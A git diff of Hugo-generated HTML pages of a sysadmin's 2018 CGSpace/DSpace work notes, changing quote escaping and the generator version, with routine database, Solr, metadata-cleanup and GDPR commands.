@ -543,7 +543,7 @@ org.apache.tomcat.jdbc.pool.PoolExhaustedException: [localhost-startStop-2] Time
<li>One other new thing I notice is that PostgreSQL 9.6 no longer uses <code>createuser</code> and <code>nocreateuser</code>, as those have actually meant <code>superuser</code> and <code>nosuperuser</code> and have been deprecated for <em>ten years</em></li>
<li>So for my notes, when I&rsquo;m importing a CGSpace database dump I need to amend my notes to give super user permission to a user, rather than create user:</li>
</ul>
<pre tabindex="0"><code>$ psql dspacetest -c 'alter user dspacetest superuser;'
<pre tabindex="0"><code>$ psql dspacetest -c &#39;alter user dspacetest superuser;&#39;
$ pg_restore -O -U dspacetest -d dspacetest -W -h localhost /tmp/dspace_2018-04-18.backup
</code></pre><ul>
<li>There&rsquo;s another issue with Tomcat in Ubuntu 18.04:</li>

View File

@ -38,7 +38,7 @@ http://localhost:3000/solr/statistics/update?stream.body=%3Ccommit/%3E
Then I reduced the JVM heap size from 6144 back to 5120m
Also, I switched it to use OpenJDK instead of Oracle Java, as well as re-worked the Ansible infrastructure scripts to support hosts choosing which distribution they want to use
"/>
<meta name="generator" content="Hugo 0.92.2" />
<meta name="generator" content="Hugo 0.93.1" />
@ -218,7 +218,7 @@ Also, I switched it to use OpenJDK instead of Oracle Java, as well as re-worked
<li>I found some more IITA records that Sisay imported on 2018-03-23 that have invalid CRP names, so now I kinda want to check those ones!</li>
<li>Combine the ORCID identifiers Abenet sent with our existing list and resolve their names using the <a href="https://gist.github.com/alanorth/57a88379126d844563c1410bd7b8d12b">resolve-orcids.py</a> script:</li>
</ul>
<pre tabindex="0"><code>$ cat ~/src/git/DSpace/dspace/config/controlled-vocabularies/cg-creator-id.xml /tmp/ilri-orcids.txt | grep -oE '[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}' | sort | uniq &gt; /tmp/2018-05-06-combined.txt
<pre tabindex="0"><code>$ cat ~/src/git/DSpace/dspace/config/controlled-vocabularies/cg-creator-id.xml /tmp/ilri-orcids.txt | grep -oE &#39;[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}&#39; | sort | uniq &gt; /tmp/2018-05-06-combined.txt
$ ./resolve-orcids.py -i /tmp/2018-05-06-combined.txt -o /tmp/2018-05-06-combined-names.txt -d
# sort names, copy to cg-creator-id.xml, add XML formatting, and then format with tidy (preserving accents)
$ tidy -xml -utf8 -iq -m -w 0 dspace/config/controlled-vocabularies/cg-creator-id.xml
@ -242,12 +242,12 @@ $ tidy -xml -utf8 -iq -m -w 0 dspace/config/controlled-vocabularies/cg-creator-i
<li>I could use it with <a href="https://github.com/okfn/reconcile-csv">reconcile-csv</a> or to populate a Solr instance for reconciliation</li>
<li>This XPath expression gets close, but outputs all items on one line:</li>
</ul>
<pre tabindex="0"><code>$ xmllint --xpath '//value-pairs[@value-pairs-name=&quot;crpsubject&quot;]/pair/stored-value/node()' dspace/config/input-forms.xml
<pre tabindex="0"><code>$ xmllint --xpath &#39;//value-pairs[@value-pairs-name=&#34;crpsubject&#34;]/pair/stored-value/node()&#39; dspace/config/input-forms.xml
Agriculture for Nutrition and HealthBig DataClimate Change, Agriculture and Food SecurityExcellence in BreedingFishForests, Trees and AgroforestryGenebanksGrain Legumes and Dryland CerealsLivestockMaizePolicies, Institutions and MarketsRiceRoots, Tubers and BananasWater, Land and EcosystemsWheatAquatic Agricultural SystemsDryland CerealsDryland SystemsGrain LegumesIntegrated Systems for the Humid TropicsLivestock and Fish
</code></pre><ul>
<li>Maybe <code>xmlstarlet</code> is better:</li>
</ul>
<pre tabindex="0"><code>$ xmlstarlet sel -t -v '//value-pairs[@value-pairs-name=&quot;crpsubject&quot;]/pair/stored-value/text()' dspace/config/input-forms.xml
<pre tabindex="0"><code>$ xmlstarlet sel -t -v &#39;//value-pairs[@value-pairs-name=&#34;crpsubject&#34;]/pair/stored-value/text()&#39; dspace/config/input-forms.xml
Agriculture for Nutrition and Health
Big Data
Climate Change, Agriculture and Food Security
@ -313,12 +313,12 @@ Livestock and Fish
<pre tabindex="0"><code>import urllib2
import re
pattern = re.compile('.*10.1016.*')
pattern = re.compile(&#39;.*10.1016.*&#39;)
if pattern.match(value):
get = urllib2.urlopen(value)
return get.getcode()
return &quot;blank&quot;
return &#34;blank&#34;
</code></pre><ul>
<li>I used a regex to limit it to just some of the DOIs in this case because there were thousands of URLs</li>
<li>Here the response code would be 200, 404, etc, or &ldquo;blank&rdquo; if there is no URL for that item</li>
@ -348,7 +348,7 @@ return &quot;blank&quot;
</ul>
<pre tabindex="0"><code>$ ./bin/solr start
$ ./bin/solr create_core -c countries
$ curl -X POST -H 'Content-type:application/json' --data-binary '{&quot;add-field&quot;: {&quot;name&quot;:&quot;country&quot;, &quot;type&quot;:&quot;text_en&quot;, &quot;multiValued&quot;:false, &quot;stored&quot;:true}}' http://localhost:8983/solr/countries/schema
$ curl -X POST -H &#39;Content-type:application/json&#39; --data-binary &#39;{&#34;add-field&#34;: {&#34;name&#34;:&#34;country&#34;, &#34;type&#34;:&#34;text_en&#34;, &#34;multiValued&#34;:false, &#34;stored&#34;:true}}&#39; http://localhost:8983/solr/countries/schema
$ ./bin/post -c countries ~/src/git/DSpace/2018-05-10-countries.csv
</code></pre><ul>
<li>It still doesn&rsquo;t catch simple mistakes like &ldquo;ALBANI&rdquo; or &ldquo;AL BANIA&rdquo; for &ldquo;ALBANIA&rdquo;, and it doesn&rsquo;t return scores, so I have to select matches manually:</li>
@ -359,7 +359,7 @@ $ ./bin/post -c countries ~/src/git/DSpace/2018-05-10-countries.csv
</ul>
<pre tabindex="0"><code>&lt;defaultSearchField&gt;search_text&lt;/defaultSearchField&gt;
...
&lt;copyField source=&quot;*&quot; dest=&quot;search_text&quot;/&gt;
&lt;copyField source=&#34;*&#34; dest=&#34;search_text&#34;/&gt;
</code></pre><ul>
<li>Actually, I wonder how much of their schema I could just copy&hellip;</li>
<li>Apparently the default search field is the <code>df</code> parameter and you could technically just add it to the query string, so no need to bother with that in the schema now</li>
@ -370,7 +370,7 @@ $ ./bin/post -c countries ~/src/git/DSpace/2018-05-10-countries.csv
<ul>
<li>Discuss GDPR with James Stapleton
<ul>
<li>As far as I see it, we are &ldquo;Data Controllers&rdquo; on CGSpace because we store peoples' names, emails, and phone numbers if they register</li>
<li>As far as I see it, we are &ldquo;Data Controllers&rdquo; on CGSpace because we store peoples&rsquo; names, emails, and phone numbers if they register</li>
<li>We set cookies on the user&rsquo;s computer, but these do not contain personally identifiable information (PII) and they are &ldquo;session&rdquo; cookies which are deleted when the user closes their browser</li>
<li>We use Google Analytics to track website usage, which makes Google the &ldquo;Data Processor&rdquo; and in this case we merely need to <em>limit</em> or <em>obfuscate</em> the information we send to them</li>
<li>As the only personally identifiable information we send is the user&rsquo;s IP address, I think we only need to enable <a href="https://support.google.com/analytics/answer/2763052">IP Address Anonymization</a> in our <code>analytics.js</code> code snippets</li>
@ -381,8 +381,8 @@ $ ./bin/post -c countries ~/src/git/DSpace/2018-05-10-countries.csv
<li>I created and merged a pull request to fix the sorting issue in Listings and Reports (<a href="https://github.com/ilri/DSpace/pull/374">#374</a>)</li>
<li>Regarding the IP Address Anonymization for GDPR, I ammended the Google Analytics snippet in <code>page-structure-alterations.xsl</code> to:</li>
</ul>
<pre tabindex="0"><code>ga('send', 'pageview', {
'anonymizeIp': true
<pre tabindex="0"><code>ga(&#39;send&#39;, &#39;pageview&#39;, {
&#39;anonymizeIp&#39;: true
});
</code></pre><ul>
<li>I tested loading a certain page before and after adding this and afterwards I saw that the parameter <code>aip=1</code> was being sent with the analytics response to Google</li>
@ -439,7 +439,7 @@ $ ./bin/post -c countries ~/src/git/DSpace/2018-05-10-countries.csv
<ul>
<li>I&rsquo;m investigating how many non-CGIAR users we have registered on CGSpace:</li>
</ul>
<pre tabindex="0"><code>dspace=# select email, netid from eperson where email not like '%cgiar.org%' and email like '%@%';
<pre tabindex="0"><code>dspace=# select email, netid from eperson where email not like &#39;%cgiar.org%&#39; and email like &#39;%@%&#39;;
</code></pre><ul>
<li>We might need to do something regarding these users for GDPR compliance because we have their names, emails, and potentially phone numbers</li>
<li>I decided that I will just use the cookieconsent script as is, since it looks good and technically does set the cookie with &ldquo;allow&rdquo; or &ldquo;dismiss&rdquo;</li>
@ -471,8 +471,8 @@ $ ./bin/post -c countries ~/src/git/DSpace/2018-05-10-countries.csv
<li>I generated a list of CIFOR duplicates from the <code>CIFOR_May_9</code> collection using the Atmire MQM module and then dumped the HTML source so I could process it for sending to Vika</li>
<li>I used grep to filter all relevant handle lines from the HTML source then used sed to insert a newline before each &ldquo;Item1&rdquo; line (as the duplicates are grouped like Item1, Item2, Item3 for each set of duplicates):</li>
</ul>
<pre tabindex="0"><code>$ grep -E 'aspect.duplicatechecker.DuplicateResults.field.del_handle_[0-9]{1,3}_Item' ~/Desktop/https\ _dspacetest.cgiar.org_atmire_metadata-quality_duplicate-checker.html &gt; ~/cifor-duplicates.txt
$ sed 's/.*Item1.*/\n&amp;/g' ~/cifor-duplicates.txt &gt; ~/cifor-duplicates-cleaned.txt
<pre tabindex="0"><code>$ grep -E &#39;aspect.duplicatechecker.DuplicateResults.field.del_handle_[0-9]{1,3}_Item&#39; ~/Desktop/https\ _dspacetest.cgiar.org_atmire_metadata-quality_duplicate-checker.html &gt; ~/cifor-duplicates.txt
$ sed &#39;s/.*Item1.*/\n&amp;/g&#39; ~/cifor-duplicates.txt &gt; ~/cifor-duplicates-cleaned.txt
</code></pre><ul>
<li>I told Vika to look through the list manually and indicate which ones are indeed duplicates that we should delete, and which ones to map to CIFOR&rsquo;s collection</li>
<li>A few weeks ago Peter wanted a list of authors from the ILRI collections, so I need to find a way to get the handles of all those collections</li>
@ -486,7 +486,7 @@ $ sed 's/.*Item1.*/\n&amp;/g' ~/cifor-duplicates.txt &gt; ~/cifor-duplicates-cle
</code></pre><ul>
<li>Then I format the list of handles and put it into this SQL query to export authors from items ONLY in those collections (too many to list here):</li>
</ul>
<pre tabindex="0"><code>dspace=# \copy (select distinct text_value, count(*) from metadatavalue where metadata_field_id = (select metadata_field_id from metadatafieldregistry where element = 'contributor' and qualifier = 'author') AND resource_type_id = 2 AND resource_id IN (select item_id from collection2item where collection_id IN (select resource_id from handle where handle in ('10568/67236','10568/67274',...))) group by text_value order by count desc) to /tmp/ilri-authors.csv with csv;
<pre tabindex="0"><code>dspace=# \copy (select distinct text_value, count(*) from metadatavalue where metadata_field_id = (select metadata_field_id from metadatafieldregistry where element = &#39;contributor&#39; and qualifier = &#39;author&#39;) AND resource_type_id = 2 AND resource_id IN (select item_id from collection2item where collection_id IN (select resource_id from handle where handle in (&#39;10568/67236&#39;,&#39;10568/67274&#39;,...))) group by text_value order by count desc) to /tmp/ilri-authors.csv with csv;
</code></pre><h2 id="2018-05-31">2018-05-31</h2>
<ul>
<li>Clarify CGSpace&rsquo;s usage of Google Analytics and personally identifiable information during user registration for Bioversity team who had been asking about GDPR compliance</li>
@ -497,9 +497,9 @@ $ sed 's/.*Item1.*/\n&amp;/g' ~/cifor-duplicates.txt &gt; ~/cifor-duplicates-cle
$ docker run --name dspacedb -e POSTGRES_PASSWORD=postgres -p 5432:5432 -d postgres:9.5-alpine
$ createuser -h localhost -U postgres --pwprompt dspacetest
$ createdb -h localhost -U postgres -O dspacetest --encoding=UNICODE dspacetest
$ psql -h localhost -U postgres dspacetest -c 'alter user dspacetest superuser;'
$ psql -h localhost -U postgres dspacetest -c &#39;alter user dspacetest superuser;&#39;
$ pg_restore -h localhost -O -U dspacetest -d dspacetest -W -h localhost ~/Downloads/cgspace_2018-05-30.backup
$ psql -h localhost -U postgres dspacetest -c 'alter user dspacetest nosuperuser;'
$ psql -h localhost -U postgres dspacetest -c &#39;alter user dspacetest nosuperuser;&#39;
$ psql -h localhost -U dspacetest -f ~/src/git/DSpace/dspace/etc/postgres/update-sequences.sql dspacetest
$ psql -h localhost -U postgres dspacetest
</code></pre>

View File

@ -58,7 +58,7 @@ real 74m42.646s
user 8m5.056s
sys 2m7.289s
"/>
<meta name="generator" content="Hugo 0.92.2" />
<meta name="generator" content="Hugo 0.93.1" />
@ -154,7 +154,7 @@ sys 2m7.289s
<li>I added the new CCAFS Phase II Project Tag <code>PII-FP1_PACCA2</code> and merged it into the <code>5_x-prod</code> branch (<a href="https://github.com/ilri/DSpace/pull/379">#379</a>)</li>
<li>I proofed and tested the ILRI author corrections that Peter sent back to me this week:</li>
</ul>
<pre tabindex="0"><code>$ ./fix-metadata-values.py -i /tmp/2018-05-30-Correct-660-authors.csv -db dspace -u dspace -p 'fuuu' -f dc.contributor.author -t correct -m 3 -n
<pre tabindex="0"><code>$ ./fix-metadata-values.py -i /tmp/2018-05-30-Correct-660-authors.csv -db dspace -u dspace -p &#39;fuuu&#39; -f dc.contributor.author -t correct -m 3 -n
</code></pre><ul>
<li>I think a sane proofing workflow in OpenRefine is to apply the custom text facets for check/delete/remove and illegal characters that I developed in <a href="/cgspace-notes/2018-03/">March, 2018</a></li>
<li>Time to index ~70,000 items on CGSpace:</li>
@ -181,7 +181,7 @@ sys 2m7.289s
<li>Institut National des Recherches Agricoles du B nin</li>
<li>Centre de Coop ration Internationale en Recherche Agronomique pour le D veloppement</li>
<li>Institut des Recherches Agricoles du B nin</li>
<li>Institut des Savannes, C te d' Ivoire</li>
<li>Institut des Savannes, C te d&rsquo; Ivoire</li>
<li>Institut f r Pflanzenpathologie und Pflanzenschutz der Universit t, Germany</li>
<li>Projet de Gestion des Ressources Naturelles, B nin</li>
<li>Universit t Hannover</li>
@ -193,9 +193,9 @@ sys 2m7.289s
<li>I uploaded fixes for all those now, but I will continue with the rest of the data later</li>
<li>Regarding the SQL migration errors, Atmire told me I need to run some migrations manually in PostgreSQL:</li>
</ul>
<pre tabindex="0"><code>delete from schema_version where version = '5.6.2015.12.03.2';
update schema_version set version = '5.6.2015.12.03.2' where version = '5.5.2015.12.03.2';
update schema_version set version = '5.8.2015.12.03.3' where version = '5.5.2015.12.03.3';
<pre tabindex="0"><code>delete from schema_version where version = &#39;5.6.2015.12.03.2&#39;;
update schema_version set version = &#39;5.6.2015.12.03.2&#39; where version = &#39;5.5.2015.12.03.2&#39;;
update schema_version set version = &#39;5.8.2015.12.03.3&#39; where version = &#39;5.5.2015.12.03.3&#39;;
</code></pre><ul>
<li>And then I need to ignore the ignored ones:</li>
</ul>
@ -205,7 +205,7 @@ update schema_version set version = '5.8.2015.12.03.3' where version = '5.5.2015
<li>Gabriela from CIP got back to me about the author names we were correcting on CGSpace</li>
<li>I did a quick sanity check on them and then did a test import with my <a href="https://gist.github.com/alanorth/df92cbfb54d762ba21b28f7cd83b6897"><code>fix-metadata-value.py</code></a> script:</li>
</ul>
<pre tabindex="0"><code>$ ./fix-metadata-values.py -i /tmp/2018-06-08-CIP-Authors.csv -db dspace -u dspace -p 'fuuu' -f dc.contributor.author -t correct -m 3
<pre tabindex="0"><code>$ ./fix-metadata-values.py -i /tmp/2018-06-08-CIP-Authors.csv -db dspace -u dspace -p &#39;fuuu&#39; -f dc.contributor.author -t correct -m 3
</code></pre><ul>
<li>I will apply them on CGSpace tomorrow I think&hellip;</li>
</ul>
@ -221,7 +221,7 @@ update schema_version set version = '5.8.2015.12.03.3' where version = '5.5.2015
<li>After removing all code mentioning MQM, mqm, metadata-quality, batchedit, duplicatechecker, etc, I think I got most of it removed, but there is a Spring error during Tomcat startup:</li>
</ul>
<pre tabindex="0"><code> INFO [org.dspace.servicemanager.DSpaceServiceManager] Shutdown DSpace core service manager
Failed to startup the DSpace Service Manager: failure starting up spring service manager: Error creating bean with name 'org.dspace.servicemanager.spring.DSpaceBeanPostProcessor#0' defined in class path resource [spring/spring-dspace-applicationContext.xml]: Unsatisfied dependency expressed through constructor argument with index 0 of type [org.dspace.servicemanager.config.DSpaceConfigurationService]: : Cannot find class [com.atmire.dspace.discovery.ItemCollectionPlugin] for bean with name 'itemCollectionPlugin' defined in file [/home/aorth/dspace/config/spring/api/discovery.xml];
Failed to startup the DSpace Service Manager: failure starting up spring service manager: Error creating bean with name &#39;org.dspace.servicemanager.spring.DSpaceBeanPostProcessor#0&#39; defined in class path resource [spring/spring-dspace-applicationContext.xml]: Unsatisfied dependency expressed through constructor argument with index 0 of type [org.dspace.servicemanager.config.DSpaceConfigurationService]: : Cannot find class [com.atmire.dspace.discovery.ItemCollectionPlugin] for bean with name &#39;itemCollectionPlugin&#39; defined in file [/home/aorth/dspace/config/spring/api/discovery.xml];
</code></pre><ul>
<li>I can fix this by commenting out the <code>ItemCollectionPlugin</code> line of <code>discovery.xml</code>, but from looking at the git log I&rsquo;m not actually sure if that is related to MQM or not</li>
<li>I will have to ask Atmire</li>
@ -336,11 +336,11 @@ Failed to startup the DSpace Service Manager: failure starting up spring service
</li>
</ul>
<pre tabindex="0"><code>or(
value.contains('€'),
value.contains('6g'),
value.contains('6m'),
value.contains('6d'),
value.contains('6e')
value.contains(&#39;&#39;),
value.contains(&#39;6g&#39;),
value.contains(&#39;6m&#39;),
value.contains(&#39;6d&#39;),
value.contains(&#39;6e&#39;)
)
</code></pre><ul>
<li>So IITA should double check the abstracts for these:
@ -357,24 +357,24 @@ Failed to startup the DSpace Service Manager: failure starting up spring service
<li>Elizabeth from CIAT contacted me to ask if I could add ORCID identifiers to all of Robin Buruchara&rsquo;s items</li>
<li>I used my <a href="https://gist.githubusercontent.com/alanorth/a49d85cd9c5dea89cddbe809813a7050/raw/f67b6e45a9a940732882ae4bb26897a9b245ef31/add-orcid-identifiers-csv.py">add-orcid-identifiers-csv.py</a> script:</li>
</ul>
<pre tabindex="0"><code>$ ./add-orcid-identifiers-csv.py -i 2018-06-13-Robin-Buruchara.csv -db dspace -u dspace -p 'fuuu'
<pre tabindex="0"><code>$ ./add-orcid-identifiers-csv.py -i 2018-06-13-Robin-Buruchara.csv -db dspace -u dspace -p &#39;fuuu&#39;
</code></pre><ul>
<li>The contents of <code>2018-06-13-Robin-Buruchara.csv</code> were:</li>
</ul>
<pre tabindex="0"><code>dc.contributor.author,cg.creator.id
&quot;Buruchara, Robin&quot;,Robin Buruchara: 0000-0003-0934-1218
&quot;Buruchara, Robin A.&quot;,Robin Buruchara: 0000-0003-0934-1218
&#34;Buruchara, Robin&#34;,Robin Buruchara: 0000-0003-0934-1218
&#34;Buruchara, Robin A.&#34;,Robin Buruchara: 0000-0003-0934-1218
</code></pre><ul>
<li>On a hunch I checked to see if CGSpace&rsquo;s bitstream cleanup was working properly and of course it&rsquo;s broken:</li>
</ul>
<pre tabindex="0"><code>$ dspace cleanup -v
...
Error: ERROR: update or delete on table &quot;bitstream&quot; violates foreign key constraint &quot;bundle_primary_bitstream_id_fkey&quot; on table &quot;bundle&quot;
Detail: Key (bitstream_id)=(152402) is still referenced from table &quot;bundle&quot;.
Error: ERROR: update or delete on table &#34;bitstream&#34; violates foreign key constraint &#34;bundle_primary_bitstream_id_fkey&#34; on table &#34;bundle&#34;
Detail: Key (bitstream_id)=(152402) is still referenced from table &#34;bundle&#34;.
</code></pre><ul>
<li>As always, the solution is to delete that ID manually in PostgreSQL:</li>
</ul>
<pre tabindex="0"><code>$ psql dspace -c 'update bundle set primary_bitstream_id=NULL where primary_bitstream_id in (152402);'
<pre tabindex="0"><code>$ psql dspace -c &#39;update bundle set primary_bitstream_id=NULL where primary_bitstream_id in (152402);&#39;
UPDATE 1
</code></pre><h2 id="2018-06-14">2018-06-14</h2>
<ul>
@ -389,9 +389,9 @@ UPDATE 1
</ul>
<pre tabindex="0"><code>$ dropdb -h localhost -U postgres dspacetest
$ createdb -h localhost -U postgres -O dspacetest --encoding=UNICODE dspacetest
$ psql -h localhost -U postgres dspacetest -c 'alter user dspacetest superuser;'
$ psql -h localhost -U postgres dspacetest -c &#39;alter user dspacetest superuser;&#39;
$ pg_restore -h localhost -U postgres -d dspacetest -O --role=dspacetest -h localhost /tmp/cgspace_2018-06-24.backup
$ psql -h localhost -U postgres dspacetest -c 'alter user dspacetest nosuperuser;'
$ psql -h localhost -U postgres dspacetest -c &#39;alter user dspacetest nosuperuser;&#39;
</code></pre><ul>
<li>The <code>-O</code> option to <code>pg_restore</code> makes the import process ignore ownership specified in the dump itself, and instead makes the schema owned by the user doing the restore</li>
<li>I always prefer to use the <code>postgres</code> user locally because it&rsquo;s just easier than remembering the <code>dspacetest</code> user&rsquo;s password, but then I couldn&rsquo;t figure out why the resulting schema was owned by <code>postgres</code></li>
@ -413,13 +413,13 @@ $ psql -h localhost -U postgres dspacetest -c 'alter user dspacetest nosuperuser
<li>So I need to make sure to run the following during the DSpace 5.8 upgrade:</li>
</ul>
<pre tabindex="0"><code>-- Delete existing CUA 4 migration if it exists
delete from schema_version where version = '5.6.2015.12.03.2';
delete from schema_version where version = &#39;5.6.2015.12.03.2&#39;;
-- Update version of CUA 4 migration
update schema_version set version = '5.6.2015.12.03.2' where version = '5.5.2015.12.03.2';
update schema_version set version = &#39;5.6.2015.12.03.2&#39; where version = &#39;5.5.2015.12.03.2&#39;;
-- Delete MQM migration since we're no longer using it
delete from schema_version where version = '5.5.2015.12.03.3';
-- Delete MQM migration since we&#39;re no longer using it
delete from schema_version where version = &#39;5.5.2015.12.03.3&#39;;
</code></pre><ul>
<li>After that you can run the migrations manually and then DSpace should work fine:</li>
</ul>
@ -427,17 +427,17 @@ delete from schema_version where version = '5.5.2015.12.03.3';
...
Done.
</code></pre><ul>
<li>Elizabeth from CIAT contacted me to ask if I could add ORCID identifiers to all of Andy Jarvis' items on CGSpace</li>
<li>Elizabeth from CIAT contacted me to ask if I could add ORCID identifiers to all of Andy Jarvis&rsquo; items on CGSpace</li>
<li>I used my <a href="https://gist.githubusercontent.com/alanorth/a49d85cd9c5dea89cddbe809813a7050/raw/f67b6e45a9a940732882ae4bb26897a9b245ef31/add-orcid-identifiers-csv.py">add-orcid-identifiers-csv.py</a> script:</li>
</ul>
<pre tabindex="0"><code>$ ./add-orcid-identifiers-csv.py -i 2018-06-24-andy-jarvis-orcid.csv -db dspacetest -u dspacetest -p 'fuuu'
<pre tabindex="0"><code>$ ./add-orcid-identifiers-csv.py -i 2018-06-24-andy-jarvis-orcid.csv -db dspacetest -u dspacetest -p &#39;fuuu&#39;
</code></pre><ul>
<li>The contents of <code>2018-06-24-andy-jarvis-orcid.csv</code> were:</li>
</ul>
<pre tabindex="0"><code>dc.contributor.author,cg.creator.id
&quot;Jarvis, A.&quot;,Andy Jarvis: 0000-0001-6543-0798
&quot;Jarvis, Andy&quot;,Andy Jarvis: 0000-0001-6543-0798
&quot;Jarvis, Andrew&quot;,Andy Jarvis: 0000-0001-6543-0798
&#34;Jarvis, A.&#34;,Andy Jarvis: 0000-0001-6543-0798
&#34;Jarvis, Andy&#34;,Andy Jarvis: 0000-0001-6543-0798
&#34;Jarvis, Andrew&#34;,Andy Jarvis: 0000-0001-6543-0798
</code></pre><h2 id="2018-06-26">2018-06-26</h2>
<ul>
<li>Atmire got back to me to say that we can remove the <code>itemCollectionPlugin</code> and <code>HasBitstreamsSSIPlugin</code> beans from DSpace&rsquo;s <code>discovery.xml</code> file, as they are used by the Metadata Quality Module (MQM) that we are not using anymore</li>
@ -455,19 +455,19 @@ Done.
<li>I&rsquo;ll have to figure out how to separate those we&rsquo;re keeping, deleting, and mapping into CIFOR&rsquo;s archive collection</li>
<li>First, get the 62 deletes from Vika&rsquo;s file and remove them from the collection:</li>
</ul>
<pre tabindex="0"><code>$ grep delete 2018-06-22-cifor-duplicates.txt | grep -o -E '[0-9]{5}\/[0-9]{5}' &gt; cifor-handle-to-delete.txt
<pre tabindex="0"><code>$ grep delete 2018-06-22-cifor-duplicates.txt | grep -o -E &#39;[0-9]{5}\/[0-9]{5}&#39; &gt; cifor-handle-to-delete.txt
$ wc -l cifor-handle-to-delete.txt
62 cifor-handle-to-delete.txt
$ wc -l 10568-92904.csv
2461 10568-92904.csv
$ while read line; do sed -i &quot;\#$line#d&quot; 10568-92904.csv; done &lt; cifor-handle-to-delete.txt
$ while read line; do sed -i &#34;\#$line#d&#34; 10568-92904.csv; done &lt; cifor-handle-to-delete.txt
$ wc -l 10568-92904.csv
2399 10568-92904.csv
</code></pre><ul>
<li>This iterates over the handles for deletion and uses <code>sed</code> with an alternative pattern delimiter of &lsquo;#&rsquo; (which must be escaped), because the pattern itself contains a &lsquo;/&rsquo;</li>
<li>The mapped ones will be difficult because we need their internal IDs in order to map them, and there are 50 of them:</li>
</ul>
<pre tabindex="0"><code>$ grep map 2018-06-22-cifor-duplicates.txt | grep -o -E '[0-9]{5}\/[0-9]{5}' &gt; cifor-handle-to-map.txt
<pre tabindex="0"><code>$ grep map 2018-06-22-cifor-duplicates.txt | grep -o -E &#39;[0-9]{5}\/[0-9]{5}&#39; &gt; cifor-handle-to-map.txt
$ wc -l cifor-handle-to-map.txt
50 cifor-handle-to-map.txt
</code></pre><ul>
@ -475,7 +475,7 @@ $ wc -l cifor-handle-to-map.txt
<li>Oooh, I can export the items one by one, concatenate them together, remove the headers, and extract the <code>id</code> and <code>collection</code> columns using <a href="https://csvkit.readthedocs.io/">csvkit</a>:</li>
</ul>
<pre tabindex="0"><code>$ while read line; do filename=${line/\//-}.csv; dspace metadata-export -i $line -f $filename; done &lt; /tmp/cifor-handle-to-map.txt
$ sed '/^id/d' 10568-*.csv | csvcut -c 1,2 &gt; map-to-cifor-archive.csv
$ sed &#39;/^id/d&#39; 10568-*.csv | csvcut -c 1,2 &gt; map-to-cifor-archive.csv
</code></pre><ul>
<li>Then I can use Open Refine to add the &ldquo;CIFOR Archive&rdquo; collection to the mappings</li>
<li>Importing the 2398 items via <code>dspace metadata-import</code> ends up with a Java garbage collection error, so I think I need to do it in batches of 1,000</li>

View File

@ -36,7 +36,7 @@ During the mvn package stage on the 5.8 branch I kept getting issues with java r
There is insufficient memory for the Java Runtime Environment to continue.
"/>
<meta name="generator" content="Hugo 0.92.2" />
<meta name="generator" content="Hugo 0.93.1" />
@ -134,7 +134,7 @@ There is insufficient memory for the Java Runtime Environment to continue.
</code></pre><ul>
<li>As the machine only has 8GB of RAM, I reduced the Tomcat memory heap from 5120m to 4096m so I could try to allocate more to the build process:</li>
</ul>
<pre tabindex="0"><code>$ export JAVA_OPTS=&quot;-Dfile.encoding=UTF-8 -Xmx1024m&quot;
<pre tabindex="0"><code>$ export JAVA_OPTS=&#34;-Dfile.encoding=UTF-8 -Xmx1024m&#34;
$ mvn -U -Dmirage2.on=true -Dmirage2.deps.included=false -Denv=dspacetest.cgiar.org -P \!dspace-lni,\!dspace-rdf,\!dspace-sword,\!dspace-swordv2 clean package
</code></pre><ul>
<li>Then I stopped the Tomcat 7 service, ran the ant update, and manually ran the old and ignored SQL migrations:</li>
@ -171,17 +171,17 @@ $ dspace database migrate ignored
</ul>
</li>
</ul>
<pre tabindex="0"><code>$ export JAVA_OPTS=&quot;-Dfile.encoding=UTF-8 -Xmx1024m&quot;
<pre tabindex="0"><code>$ export JAVA_OPTS=&#34;-Dfile.encoding=UTF-8 -Xmx1024m&#34;
$ dspace metadata-import -e aorth@mjanja.ch -f /tmp/2018-06-27-New-CIFOR-Archive.csv
$ dspace metadata-import -e aorth@mjanja.ch -f /tmp/2018-06-27-New-CIFOR-Archive2.csv
</code></pre><ul>
<li>I noticed there are many items that use HTTP instead of HTTPS for their Google Books URL, and some missing HTTP entirely:</li>
</ul>
<pre tabindex="0"><code>dspace=# select count(*) from metadatavalue where resource_type_id=2 and metadata_field_id=222 and text_value like 'http://books.google.%';
<pre tabindex="0"><code>dspace=# select count(*) from metadatavalue where resource_type_id=2 and metadata_field_id=222 and text_value like &#39;http://books.google.%&#39;;
count
-------
785
dspace=# select count(*) from metadatavalue where resource_type_id=2 and metadata_field_id=222 and text_value ~ '^books\.google\..*';
dspace=# select count(*) from metadatavalue where resource_type_id=2 and metadata_field_id=222 and text_value ~ &#39;^books\.google\..*&#39;;
count
-------
4
@ -189,11 +189,11 @@ dspace=# select count(*) from metadatavalue where resource_type_id=2 and metadat
<li>I think I should fix that as well as some other garbage values like &ldquo;test&rdquo; and &ldquo;dspace.ilri.org&rdquo; etc:</li>
</ul>
<pre tabindex="0"><code>dspace=# begin;
dspace=# update metadatavalue set text_value = regexp_replace(text_value, 'http://books.google', 'https://books.google') where resource_type_id=2 and metadata_field_id=222 and text_value like 'http://books.google.%';
dspace=# update metadatavalue set text_value = regexp_replace(text_value, &#39;http://books.google&#39;, &#39;https://books.google&#39;) where resource_type_id=2 and metadata_field_id=222 and text_value like &#39;http://books.google.%&#39;;
UPDATE 785
dspace=# update metadatavalue set text_value = regexp_replace(text_value, 'books.google', 'https://books.google') where resource_type_id=2 and metadata_field_id=222 and text_value ~ '^books\.google\..*';
dspace=# update metadatavalue set text_value = regexp_replace(text_value, &#39;books.google&#39;, &#39;https://books.google&#39;) where resource_type_id=2 and metadata_field_id=222 and text_value ~ &#39;^books\.google\..*&#39;;
UPDATE 4
dspace=# update metadatavalue set text_value='https://books.google.com/books?id=meF1CLdPSF4C' where resource_type_id=2 and metadata_field_id=222 and text_value='meF1CLdPSF4C';
dspace=# update metadatavalue set text_value=&#39;https://books.google.com/books?id=meF1CLdPSF4C&#39; where resource_type_id=2 and metadata_field_id=222 and text_value=&#39;meF1CLdPSF4C&#39;;
UPDATE 1
dspace=# delete from metadatavalue where resource_type_id=2 and metadata_field_id=222 and metadata_value_id in (2299312, 10684, 10700, 996403);
DELETE 4
@ -202,7 +202,7 @@ dspace=# commit;
<li>Testing DSpace 5.8 with PostgreSQL 9.6 and Tomcat 8.5.32 (instead of my usual 7.0.88) and for some reason I get autowire errors on Catalina startup with 8.5.32:</li>
</ul>
